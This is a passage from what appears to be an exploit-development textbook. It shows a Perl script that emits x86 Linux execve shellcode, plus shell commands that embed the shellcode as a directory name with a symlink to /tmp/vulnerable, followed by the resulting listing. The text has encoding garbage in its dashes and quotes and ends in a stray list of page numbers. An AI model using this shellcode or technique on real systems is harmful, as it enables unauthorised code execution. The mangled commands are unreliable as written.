pl to print the assembled shellcode
minus the string ???/bin/sh???:
#!/usr/bin/perl
binmode(STDOUT);
print "\xeb\x0f\x5e\x31\xc0\x50\x89\xe2\x56\x89\xe1" .
"\xb0\x0b\x89\xf3\xcd\x80\xe8\xec\xff\xff\xff";
NOTE Perl??™s binmode function is used to place a stream in binary transfer
mode. In binary mode, a stream will not perform any character conversions
(such as Unicode expansion) on the data that traverses the stream. While this
function may not be required on all platforms,we include it here to make the
script as portable as possible.
Next you create a directory name from the shellcode. Thisworks because Linux allows
virtually any character to be part of a directory or filename. To overcome the restriction
on using / in a filename, you append /bin to the shellcode by creating a subdirectory at
the same time:
# mkdir ??“p `./nq_aleph.pl`/bin
And last you create the symlink that appends /sh onto your shellcode:
# ln ??“s /tmp/vulnerable `./nq_aleph.pl`/bin/sh
Which leaves us with:
# ls -lR *
-rwxr--r-- 1 demo demo 195 Jul 8 10:08 nq_aleph.pl
??^?v?1??F??F??????N??V????1?›??@????????:
total 1
drwxr-xr-x 2 demo demo 1024 Jul 8 10:13 bin
??^?v?1??F??F??????N??V????1?›??@????????/bin:
total 0
lrwxrwxrwx 1 demo demo 15 Jul 8 10:13 sh -> /tmp/vulnerable
Notice the garbage characters in the first subdirectory name.
Pages:
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827